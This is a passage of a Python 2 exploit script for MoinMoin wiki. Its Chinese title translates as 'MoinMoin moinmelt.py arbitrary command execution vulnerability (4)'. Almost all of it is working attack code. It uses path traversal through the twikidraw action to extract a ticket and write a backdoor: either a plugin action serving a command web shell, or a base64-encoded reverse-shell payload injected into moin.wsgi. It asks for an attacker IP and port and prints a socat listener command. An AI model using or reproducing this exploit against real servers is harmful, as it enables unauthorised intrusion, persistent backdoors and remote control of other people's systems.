MoinMoin 'moinmelt.py'任意命令执行漏洞(4)

print "[*] Obtaining ticket credentials to write backdoor.."
 if method == '1':
    ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../plugin/action/moinexec.py" % target, cookies=jar)
 elif method == '2':
    ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../../moin.wsgi" % target, cookies=jar)
 m = re.search('ticket=(.*?)&target', ticket.text)
 try:
    ticket_hash = m.group(1)
    print "[+] Extracted ticket hash from MoinMoin: %s" % (ticket_hash)
 except:
    print "[-] \x1b[0;31mFailed to extract ticket hash from MoinMoin!\x1b[0m"
    exit()

print "[*] Sending payload.."
 if method == '1':
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../plugin/action/moinexec.py" % (target, ticket_hash)
    b = []
    b.append("\r\n--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename))
    b.append("--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"")
    b.append("Content-Type: image/png\r\n")
    b.append(data)
    b.append("--89692781418184--")
    body = "\r\n".join(b)
    headers = {}
    headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184'
    r = requests.post(url, cookies=jar, data=body, headers=headers)
    if(r.text == ""):
        print "[+] Exploit completed"
        print "[*] Upon Apache restart, your shell will be available at:"
        print "http://%s/WikiSandBox?action=moinexec&c=[command]" % target
    else:
        print "[-] \x1b[0;31mExploit failed\x1b[0m"
 elif method == '2':
    print "[*] Backconnect options:"
    ip  = raw_input("[*] IP? ")
    port = raw_input("[*] Port? ")
    print "[*] To recieve your shell, login to %s and run: socat file:`tty`,raw,echo=0 tcp4-listen:%s" % (ip,port)
    raw_input("[*] Press enter to continue ")
    payload = "[MARK]exec \"%s\".decode(\"base64\")[MARK]\n" % data.replace("[IP]",ip).replace("[PORT]",port).encode("base64").replace("\n","")
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../../moin.wsgi" % (target, ticket_hash)
    b = []
    b.append("\r\n--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename))
    b.append("--89692781418184")
    b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"")
    b.append("Content-Type: image/png\r\n")
    b.append(payload)
    b.append("--89692781418184--")
    body = "\r\n".join(b)
    headers = {}
    headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184'
    r = requests.post(url, cookies=jar, data=body, headers=headers)
    if(r.text == ""):
        print "[+] Payload file written"
    else:
        print "[-] \x1b[0;31mExploit failed\x1b[0m"
        exit()
    print "[*] Sending reverse shell"
    result = requests.get("http://%s/WikiSandBox?action=AttachFile" % target, cookies=jar).text
    if "Internal Server Error" in result or "Traceback" in result:
        print "[-] \x1b[0;31mSHIT\x1b[0m"
    else:
        print "[+] Shell sent successfully"

# American: How the fuck did you get in here?
 # Lone Man: I used my imagination.